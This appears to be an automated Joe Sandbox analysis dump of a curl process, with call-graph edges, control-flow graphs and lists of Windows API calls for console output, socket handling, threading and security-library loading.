120618->120633 120620->120607 120620->120612 120621->120591 120622->120603 120623->120603 120624->120603 120625->120603 120634 2cf3f8 120626->120634 120628 2cfc2d 120628->120611 120629->120609 120630->120611 120631->120616 120632->120618 120633->120620 120637 2cf404 120634->120637 120635 2cf41a 120645 2be62a 58 API calls 120635->120645 120637->120635 120639 2cf450 120637->120639 120638 2cf41f 120646 2c5b0e 9 API calls 120638->120646 120641 2cf4c1 109 API calls 120639->120641 120642 2cf46c 120641->120642 120647 2cf495 LeaveCriticalSection 120642->120647 120644 2cf429 120644->120628 120645->120638 120646->120644 120647->120644 120648 1cc720 120649 1cc752 120648->120649 120658 2c2a86 120649->120658 120651 1cc768 120652 1cc778 ExpandEnvironmentStringsA 120651->120652 120657 1cc7b1 120651->120657 120653 1cc790 120652->120653 120652->120657 120653->120657 120671 2beea1 61 API calls 120653->120671 120654 2be5e7 6 API calls 120655 1cc823 120654->120655 120657->120654 120661 2c2a92 120658->120661 120659 2c2aa4 120678 2be62a 58 API calls 120659->120678 120661->120659 120664 2c2ace 120661->120664 120662 2c2aa9 120679 2c5b0e 9 API calls 120662->120679 120665 2c8f5f 58 API calls 120664->120665 120666 2c2ad5 120665->120666 120672 2c2a02 120666->120672 120669 2c2ab4 120669->120651 120671->120657 120673 2c2a19 120672->120673 120674 2c2a15 120672->120674 120673->120674 120675 2c2a2b 120673->120675 120684 2cef53 79 API calls 120673->120684 120680 2c2afd LeaveCriticalSection 120674->120680 120675->120674 120681 2cefe2 120675->120681 120678->120662 120679->120669 120680->120669 120685 2ceffa 120681->120685 120684->120675 120703 2be67e 120685->120703 120688 2cf029 120731 2be62a 58 API calls 120688->120731 120689 2cf040 120693 2cf049 120689->120693 120694 2cf05b 120689->120694 120691 2ceff5 120691->120675 120692 2cf02e 120732 2c5b0e 9 API calls 120692->120732 120733 2be62a 58 API calls 120693->120733 120696 2cf064 120694->120696 120697 2cf076 120694->120697 120711 2d8303 120696->120711 120735 2d866c 120697->120735 120699 2cf04e 120734 2c5b0e 9 API calls 120699->120734 120704 2be68f 120703->120704 120706 2be6dc 120703->120706 120705 2c5cba 58 API calls 120704->120705 120707 2be695 120705->120707 120706->120688 120706->120689 120706->120691 120708 2be6bc 120707->120708 120709 2c61bd 58 API calls 120707->120709 120708->120706 120740 2c653f 58 API calls 120708->120740 120709->120708 120712 2be67e 58 API calls 120711->120712 120713 2d8317 120712->120713 120714 2d8333 120713->120714 120715 2d834a 120713->120715 120717 2d831e 120713->120717 120741 2be62a 58 API calls 120714->120741 120719 2d8365 120715->120719 120720 2d8353 120715->120720 120717->120691 120718 2d8338 120742 2c5b0e 9 API calls 120718->120742 120721 2d8385 120719->120721 120722 2d8372 120719->120722 120743 2be62a 58 API calls 120720->120743 120726 2d866c 65 API calls 120721->120726 120745 2c4c37 65 API calls 120722->120745 120728 2d839b 120726->120728 120727 2d8358 120744 2c5b0e 9 API calls 120727->120744 120728->120717 120746 2be62a 58 API calls 120728->120746 120731->120692 120732->120691 120733->120699 120734->120691 120736 2be67e 58 API calls 120735->120736 120737 2d867d 120736->120737 120747 2d83c8 120737->120747 120740->120706 120741->120718 120742->120717 120743->120727 120744->120717 120745->120717 120746->120717 120749 2d83fa 120747->120749 120748 2be5e7 6 API calls 120750 2d8648 120748->120750 120751 2d84e6 MultiByteToWideChar 120749->120751 120753 2d8472 GetCPInfo 120749->120753 120760 2d8421 120749->120760 120750->120691 120752 2d8504 120751->120752 120751->120760 120758 2bfd90 58 API calls 120752->120758 120759 2d852c 120752->120759 120754 2d8481 120753->120754 120753->120760 120754->120751 120754->120760 120755 2d8560 MultiByteToWideChar 120756 2d857a MultiByteToWideChar 120755->120756 120768 2d862d 120755->120768 120762 2d8598 120756->120762 120756->120768 120758->120759 120759->120755 120759->120760 120760->120748 120761 2d85f7 MultiByteToWideChar 120763 2d860c 120761->120763 120764 2d8621 120761->120764 120766 2bfd90 58 API calls 120762->120766 120769 2d85c0 120762->120769 120770 2d7042 120763->120770 120774 2c4f6d 58 API calls 120764->120774 120766->120769 120775 2c4f6d 58 API calls 120768->120775 120769->120761 120769->120768 120771 2d706d 120770->120771 120772 2d7052 CompareStringEx 120770->120772 120773 2d7084 CompareStringW 120771->120773 120772->120764 120773->120764 120774->120768 120775->120760 120776 1d1120 120777 1d1129 120776->120777 120778 1d1130 120776->120778 120779 1d114d 120778->120779 120780 1d1136 120778->120780 120785 1d1159 120779->120785 120812 1d43e0 191 API calls 120779->120812 120811 1d3960 83 API calls 120780->120811 120782 1d1141 120787 1d115f 120785->120787 120798 1d61f0 61 API calls 120785->120798 120786 1d1177 120799 1d4570 85 API calls 120786->120799 120789 1d1183 120790 1d118b 120789->120790 120791 1d11a4 120789->120791 120813 1d5ac0 167 API calls 120790->120813 120800 1d0f90 120791->120800 120794 1d1190 120795 1d11ac 120814 1d46a0 122 API calls 120795->120814 120797 1d11b7 120798->120786 120799->120789 120805 1d0fa0 120800->120805 120801 1d0fae GetTickCount64 120801->120805 120803 1d10f5 120803->120795 120804 1d100b GetTickCount64 120804->120805 120805->120801 120805->120803 120805->120804 120807 1d107d 120805->120807 120808 1d10e4 Sleep 120805->120808 120809 1d1072 WSASetLastError 120805->120809 120815 1d4990 120805->120815 120807->120803 120807->120805 120810 1d10d4 120807->120810 120833 1d5940 123 API calls 120807->120833 120808->120807 120809->120807 120810->120795 120811->120782 120812->120785 120813->120794 120814->120797 120816 1d4b4e 120815->120816 120817 1d49c3 120815->120817 120819 2be5e7 6 API calls 120816->120819 120817->120816 120818 1d49cf 120817->120818 120834 1d6300 GetTickCount64 120818->120834 120821 1d4b62 120819->120821 120821->120805 120822 1d4a55 120824 2be5e7 6 API calls 120822->120824 120823 1d49d8 120823->120822 120827 1d4a6b 120823->120827 120826 1d4a67 120824->120826 120825 1d4b18 120828 2be5e7 6 API calls 120825->120828 120826->120805 120827->120825 120830 1d3850 83 API calls 120827->120830 120829 1d4b4a 120828->120829 120829->120805 120831 1d4b0e 120830->120831 120835 1dfa40 15 API calls 120831->120835 120833->120807 120834->120823 120835->120825 120836 1de9e0 120837 1dea06 120836->120837 120854 1de860 120837->120854 120839 1dea2c 120840 1d3850 83 API calls 120839->120840 120841 1dea48 120839->120841 120840->120841 120842 1dea84 120841->120842 120853 1deb11 120841->120853 120909 2089d0 120841->120909 120846 1dea88 120842->120846 120864 1df4c0 120842->120864 120845 1deaa7 120847 1deae6 120845->120847 120848 1deab2 120845->120848 120915 1de900 88 API calls 120847->120915 120849 1deabc 120848->120849 120848->120853 120914 1df350 98 API calls 120849->120914 120852 1deac7 120852->120846 120855 1cf7a0 83 API calls 120854->120855 120857 1de875 120855->120857 120856 1de8ee 120856->120839 120857->120856 120859 1de89f 120857->120859 120916 2c3045 65 API calls 120857->120916 120917 1de7d0 7 API calls 120859->120917 120861 1de8d3 120862 1de8e2 120861->120862 120863 1d3850 83 API calls 120861->120863 120862->120839 120863->120862 120865 1df4fd 120864->120865 120866 1df528 120865->120866 120867 1df501 120865->120867 120918 208060 6 API calls 120866->120918 120938 208900 htons 120867->120938 120870 1df514 120872 2be5e7 6 API calls 120870->120872 120871 1df533 120873 1df55e 120871->120873 120874 1df537 120871->120874 120876 1df524 120872->120876 120875 1df571 120873->120875 120879 1df57d 120873->120879 120880 1df56a 120873->120880 120939 208900 htons 120874->120939 120884 1cf6a0 83 API calls 120875->120884 120876->120845 120878 1df54a 120881 2be5e7 6 API calls 120878->120881 120883 2089d0 2 API calls 120879->120883 120882 2089d0 2 API calls 120880->120882 120885 1df55a 120881->120885 120882->120875 120883->120875 120886 1df5ce 120884->120886 120885->120845 120919 1df140 120886->120919 120888 1df5e0 120889 1df604 GetLastError 120888->120889 120890 1df5e7 120888->120890 120931 1d23b0 87 API calls 120889->120931 120891 2be5e7 6 API calls 120890->120891 120893 1df600 120891->120893 120893->120845 120894 1df613 120895 1d3850 83 API calls 120894->120895 120896 1df621 120895->120896 120932 2085f0 getaddrinfo 120896->120932 120898 1df636 120899 1df63d WSAGetLastError 120898->120899 120900 1df674 120898->120900 120940 1d23b0 87 API calls 120899->120940 120901 2be5e7 6 API calls 120900->120901 120903 1df685 120901->120903 120903->120845 120904 1df64c 120905 1d3850 83 API calls 120904->120905 120906 1df65e 120905->120906 120907 2be5e7 6 API calls 120906->120907 120908 1df670 120907->120908 120908->120845 120910 208a13 120909->120910 120911 2089db socket 120909->120911 120910->120842 120912 2089fc closesocket 120911->120912 120913 2089ec 120911->120913 120912->120910 120913->120842 120914->120852 120915->120853 120916->120857 120917->120861 120918->120871 120920 1df152 120919->120920 120930 1df20b 120920->120930 120941 1deef0 120920->120941 120923 1df218 SetLastError 120923->120888 120924 1df1a3 120924->120930 120947 2c34e6 120924->120947 120927 1df226 120927->120888 120928 1df206 120966 2be62a 58 API calls 120928->120966 120967 1df0b0 6 API calls 120930->120967 120931->120894 120934 20861d 120932->120934 120937 20871a 120932->120937 120933 208768 WSASetLastError 120933->120937 120934->120933 120935 208716 120934->120935 120936 20870f freeaddrinfo 120934->120936 120935->120933 120935->120937 120936->120935 120937->120898 120938->120870 120939->120878 120940->120904 120942 1def04 120941->120942 120943 1def36 InitializeCriticalSectionEx 120942->120943 120945 1def6e 120942->120945 120944 1def4f 120943->120944 120944->120945 120946 1def5f DeleteCriticalSection 120944->120946 120945->120924 120946->120945 120948 2c3508 120947->120948 120949 2c34f4 120947->120949 120951 2c90de 58 API calls 120948->120951 120968 2be62a 58 API calls 120949->120968 120953 2c3515 120951->120953 120952 2c34f9 120969 2c5b0e 9 API calls 120952->120969 120955 2c3566 120953->120955 120957 2c5cba 58 API calls 120953->120957 120956 2be832 58 API calls 120955->120956 120958 2c356c 120956->120958 120959 2c3522 120957->120959 120961 1df1f2 120958->120961 120970 2be609 58 API calls 120958->120970 120960 2c5d41 58 API calls 120959->120960 120962 2c352b CreateThread 120960->120962 120961->120927 120961->120928 120962->120961 120965 2c355e GetLastError 120962->120965 120971 2c3646 120962->120971 120965->120955 120966->120930 120967->120923 120968->120952 120969->120961 120970->120961 120972 2c364f 120971->120972 120973 2cb776 TlsGetValue 120972->120973 120974 2c3655 120973->120974 120975 2c365c 120974->120975 120976 2c3688 120974->120976 121001 2cb795 TlsSetValue 120975->121001 121002 2c5b4f 58 API calls 120976->121002 120979 2c366b 120981 2c367e GetCurrentThreadId 120979->120981 120982 2c3671 GetLastError ExitThread 120979->120982 120980 2c36a3 120985 2c36b7 120980->120985 120987 2c35ee 120980->120987 120981->120980 120993 2c357f 120985->120993 120988 2c35f7 LoadLibraryExW GetProcAddress 120987->120988 120989 2c3630 DecodePointer 120987->120989 120990 2c3619 120988->120990 120991 2c361a EncodePointer 120988->120991 120992 2c3640 120989->120992 120990->120985 120991->120989 120992->120985 120994 2c358b 120993->120994 120995 2c5cba 58 API calls 120994->120995 120996 2c3590 120995->120996 121003 2c35c0 120996->121003 121001->120979 121002->120980 121004 2c5cd2 58 API calls 121003->121004 121005 2c35c9 121004->121005 121006 2c35e4 ExitThread 121005->121006 121007 2c35dd 121005->121007 121008 2c35d8 121005->121008 121013 2c5c84 58 API calls 121007->121013 121012 2c36c3 LoadLibraryExW GetProcAddress EncodePointer DecodePointer 121008->121012 121011 2c35e3 121011->121006 121012->121007 121013->121011

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 002C9A93 Relevance: 18.5, APIs: 12, Instructions: 548COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 423 2c9a93-2c9ad2 call 2cf0b0 426 2c9adb-2c9add 423->426 427 2c9ad4-2c9ad6 423->427 429 2c9afe-2c9b2a 426->429 430 2c9adf-2c9af9 call 2be5f6 call 2be62a call 2c5b0e 426->430 428 2ca2e8-2ca2f7 call 2be5e7 427->428 431 2c9b2c-2c9b2f 429->431 432 2c9b31-2c9b38 429->432 430->428 431->432 435 2c9b5c-2c9b61 431->435 436 2c9b3a-2c9b51 call 2be5f6 call 2be62a call 2c5b0e 432->436 437 2c9b56 432->437 441 2c9b72-2c9b80 call 2d73d2 435->441 442 2c9b63-2c9b6f call 2c08c3 435->442 472 2ca2de-2ca2e1 436->472 437->435 453 2c9ed6-2c9eee 441->453 454 2c9b86-2c9b9e 441->454 442->441 457 2ca269-2ca286 WriteFile 453->457 458 2c9ef4-2c9f04 453->458 454->453 456 2c9ba4-2c9be2 call 2c5cba GetConsoleMode 454->456 456->453 475 2c9be8-2c9bee 456->475 461 2ca28c-2ca294 457->461 462 2c9ec9-2c9ed1 GetLastError 457->462 463 2ca018-2ca01d 458->463 464 2c9f0a-2c9f15 458->464 466 2c9fe0 461->466 462->466 470 2ca10d-2ca118 463->470 471 2ca023-2ca026 463->471 468 2ca2a8-2ca2c0 464->468 469 2c9f1b-2c9f2b 464->469 473 2c9fe6-2c9fe8 466->473 478 2ca2cb-2ca2db call 2be62a call 2be5f6 468->478 479 2ca2c2-2ca2c5 468->479 477 2c9f31-2c9f33 469->477 470->468 476 2ca11e 470->476 471->468 480 2ca02c 471->480 474 2ca2e7 472->474 482 2c9fee-2c9ff0 473->482 483 2ca2e3-2ca2e5 473->483 474->428 484 2c9bf8-2c9c21 GetConsoleCP 475->484 485 2c9bf0-2c9bf2 475->485 486 2ca128-2ca13d 476->486 487 2c9f79-2c9fb0 WriteFile 477->487 488 2c9f35-2c9f4e 477->488 478->472 479->478 490 2ca2c7-2ca2c9 479->490 489 2ca036-2ca04f 480->489 492 2c9ff6-2c9ffb 482->492 493 2ca2a2 482->493 483->474 484->468 497 2c9c27-2c9c35 484->497 485->453 485->484 494 2ca143-2ca145 486->494 487->462 498 2c9fb6-2c9fc2 487->498 495 2c9f5b-2c9f77 488->495 496 2c9f50-2c9f5a 488->496 499 2ca050-2ca053 489->499 490->474 501 2ca299-2ca2a0 call 2be609 492->501 502 2ca001-2ca013 call 2be62a call 2be5f6 492->502 493->468 504 2ca147-2ca15d 494->504 505 2ca182-2ca1c3 WideCharToMultiByte 494->505 495->477 495->487 496->495 503 2c9c3f-2c9c47 497->503 506 2c9fda 498->506 507 2c9fc4-2c9fd4 498->507 508 2ca088-2ca0d1 WriteFile 499->508 509 2ca055-2ca065 499->509 501->472 502->472 518 2c9c4d-2c9c7a 503->518 519 2c9dfb-2c9dfe 503->519 516 2ca15f-2ca16e 504->516 517 2ca171-2ca180 504->517 505->462 520 2ca1c9-2ca1cb 505->520 506->466 507->469 507->506 508->462 513 2ca0d7-2ca0e9 508->513 510 2ca077-2ca086 509->510 511 2ca067-2ca074 509->511 510->499 510->508 511->510 513->466 521 2ca0ef-2ca102 513->521 516->517 517->494 517->505 526 2c9c7c-2c9c96 518->526 527 2c9c98-2c9ca4 call 2cf115 518->527 522 2c9e05-2c9e32 519->522 523 2c9e00-2c9e03 519->523 528 2ca1d1-2ca204 WriteFile 520->528 521->489 531 2ca108 521->531 532 2c9e38-2c9e3b 522->532 523->522 523->532 535 2c9cf2-2c9d04 call 2d7584 526->535 543 2c9cea-2c9cec 527->543 544 2c9ca6-2c9cba 527->544 529 2ca224-2ca238 GetLastError 528->529 530 2ca206-2ca220 528->530 538 2ca23e-2ca240 529->538 530->528 536 2ca222 530->536 531->466 539 2c9e3d-2c9e40 532->539 540 2c9e42-2c9e52 call 2d759c 532->540 535->466 554 2c9d0a 535->554 536->538 538->466 545 2ca246-2ca25e 538->545 539->540 548 2c9e8d-2c9e90 539->548 540->462 556 2c9e54-2c9e5d 540->556 543->535 549 2c9e9b-2c9ec4 544->549 550 2c9cc0-2c9cd5 call 2d7584 544->550 545->486 552 2ca264 545->552 548->503 551 2c9e96 548->551 549->466 550->466 562 2c9cdb-2c9ce8 550->562 551->466 552->466 557 2c9d10-2c9d45 WideCharToMultiByte 554->557 559 2c9e5f-2c9e78 call 2d759c 556->559 560 2c9e81-2c9e87 556->560 557->466 561 2c9d4b-2c9d77 WriteFile 557->561 559->462 567 2c9e7a-2c9e7b 559->567 560->548 561->462 564 2c9d7d-2c9d97 561->564 562->557 564->473 566 2c9d9d-2c9da3 564->566 568 2c9da5-2c9dd6 WriteFile 566->568 569 2c9df0-2c9df6 566->569 567->560 568->462 570 2c9ddc-2c9de3 568->570 569->560 570->466 571 2c9de9-2c9def 570->571 571->569
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fc9eb723e71ba44864c7c9c7d8e6e5c6a517e99b8afc6ddf3760d31a02b41d71
                                                                                                                                                                    • Instruction ID: ad7dd3988762447a3bbf53826b98bfa5012267cd8411d4d344783dfed33329d2
                                                                                                                                                                    • Opcode Fuzzy Hash: fc9eb723e71ba44864c7c9c7d8e6e5c6a517e99b8afc6ddf3760d31a02b41d71
                                                                                                                                                                    • Instruction Fuzzy Hash: 3F326D75B221298BCB24CF58DC84BE9B7B5FB46314F0842DEE40AE7A44D6709E91CF52
                                                                                                                                                                    Function 001DF690 Relevance: 18.3, APIs: 12, Instructions: 290networksleepCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 572 1df690-1df6d3 573 1df725-1df727 572->573 574 1df6d5-1df6d7 572->574 576 1df75d-1df772 573->576 577 1df729-1df759 GetTickCount64 call 2ccc40 573->577 574->573 575 1df6d9-1df6dc 574->575 575->573 578 1df6de-1df6e0 575->578 579 1df774-1df78c 576->579 580 1df793-1df796 576->580 577->576 582 1df70e-1df724 call 2be5e7 578->582 583 1df6e2 578->583 579->580 584 1df7f9-1df80a 580->584 585 1df798-1df79c 580->585 589 1df6e4-1df6e9 WSASetLastError 583->589 590 1df707-1df708 Sleep 583->590 587 1df80c-1df822 584->587 588 1df85a-1df86c 584->588 591 1df79e 585->591 592 1df7ab-1df7ad 585->592 594 1df839-1df83b 587->594 595 1df824 587->595 600 1df870 588->600 596 1df6ef-1df706 call 2be5e7 589->596 590->582 597 1df7a0-1df7a4 591->597 598 1df7af-1df7b2 592->598 599 1df7c1-1df7c5 592->599 605 1df83d-1df840 594->605 606 1df853-1df856 594->606 602 1df827-1df82e 595->602 597->592 604 1df7a6-1df7a9 597->604 598->599 607 1df7b4-1df7bd 598->607 608 1df7d5-1df7d7 599->608 609 1df7c7-1df7ce 599->609 610 1df874-1df876 600->610 611 1df835 602->611 612 1df830-1df833 602->612 604->592 604->597 605->606 614 1df842-1df84c 605->614 606->588 607->599 616 1df7d9-1df7dc 608->616 617 1df7f4-1df7f6 608->617 609->608 615 1df7d0-1df7d3 609->615 618 1df878-1df8a3 610->618 619 1df8a5 610->619 611->594 612->602 612->611 614->606 615->608 615->609 616->617 622 1df7de-1df7ed 616->622 617->584 620 1df8b7-1df8eb select 618->620 619->620 621 1df8a7-1df8af 619->621 623 1df986-1df988 620->623 624 1df8f1-1df8f9 WSAGetLastError 620->624 621->620 622->617 623->596 627 1df98e 623->627 625 1df8fb-1df902 624->625 626 1df913-1df915 624->626 625->596 628 1df908-1df90d 625->628 629 1df924-1df973 GetTickCount64 call 2ccc40 626->629 630 1df917-1df91f 626->630 627->582 631 1df994-1df9a3 627->631 628->596 628->626 629->582 643 1df979-1df981 629->643 630->600 633 1df9cc-1df9cf 631->633 634 1df9a5-1df9c7 __WSAFDIsSet * 2 631->634 635 1df9d1-1df9db __WSAFDIsSet 633->635 636 1df9f2-1df9f8 633->636 634->633 638 1df9c9 634->638 639 1df9dd 635->639 640 1df9e0-1df9ed __WSAFDIsSet 635->640 641 1dfa1e-1dfa34 call 2be5e7 636->641 642 1df9fa-1dfa07 __WSAFDIsSet 636->642 638->633 639->640 640->636 644 1df9ef 640->644 645 1dfa0c-1dfa19 __WSAFDIsSet 642->645 646 1dfa09 642->646 643->610 644->636 645->641 648 1dfa1b 645->648 646->645 648->641
                                                                                                                                                                    APIs
                                                                                                                                                                    • WSASetLastError.WS2_32(00002726,00000000), ref: 001DF6E9
                                                                                                                                                                    • Sleep.KERNEL32(?,00000000), ref: 001DF708
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001DF72D
                                                                                                                                                                    • select.WS2_32(?,?,?,?,?), ref: 001DF8E2
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,000003E8,00000000), ref: 001DF8F1
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001DF924
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 001DF9AB
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 001DF9C3
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 001DF9D7
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(00000000,?), ref: 001DF9E9
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(?,00000000), ref: 001DFA03
                                                                                                                                                                    • __WSAFDIsSet.WS2_32(?,?), ref: 001DFA15
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64ErrorLastTick$Sleepselect
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3934714958-0
                                                                                                                                                                    • Opcode ID: 48ca7d261ad6f2db8f2a5865749150ae03a13eeca86c9be1da10ae1e6ef59a44
                                                                                                                                                                    • Instruction ID: e19c0e24a2f3737f509bfde852cf1fe45e817c2901a3fd26e21791528a88d708
                                                                                                                                                                    • Opcode Fuzzy Hash: 48ca7d261ad6f2db8f2a5865749150ae03a13eeca86c9be1da10ae1e6ef59a44
                                                                                                                                                                    • Instruction Fuzzy Hash: 6EA16F72A043419BDB28DF28D8946AEB6E9EF84354F514A3FF45EC6290D730DA428B42
                                                                                                                                                                    Function 001E1CE0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 79libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 994 1e1ce0-1e1cff 995 1e1db9 994->995 996 1e1d05-1e1d68 call 2c83f0 VerSetConditionMask * 2 VerifyVersionInfoA 994->996 997 1e1dbb-1e1dd3 call 2be5e7 995->997 1002 1e1d6a-1e1d7a VerifyVersionInfoA 996->1002 1003 1e1d83 996->1003 1002->1003 1004 1e1d7c-1e1d81 1002->1004 1005 1e1d88-1e1d95 LoadLibraryA 1003->1005 1004->1005 1006 1e1d9e-1e1dac GetProcAddress 1005->1006 1007 1e1d97-1e1d9c 1005->1007 1006->1007 1008 1e1dae-1e1db7 1006->1008 1007->997 1008->995 1008->1007
                                                                                                                                                                    APIs
                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 001E1D3F
                                                                                                                                                                    • VerSetConditionMask.KERNEL32(00000000,00000000,00000008,00000001), ref: 001E1D4D
                                                                                                                                                                    • VerifyVersionInfoA.KERNEL32(?,00000002,00000000), ref: 001E1D64
                                                                                                                                                                    • VerifyVersionInfoA.KERNEL32(?,00000008,00000000,?), ref: 001E1D76
                                                                                                                                                                    • LoadLibraryA.KERNELBASE(secur32.dll), ref: 001E1D88
                                                                                                                                                                    • GetProcAddress.KERNELBASE(00000000,InitSecurityInterfaceA), ref: 001E1DA4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
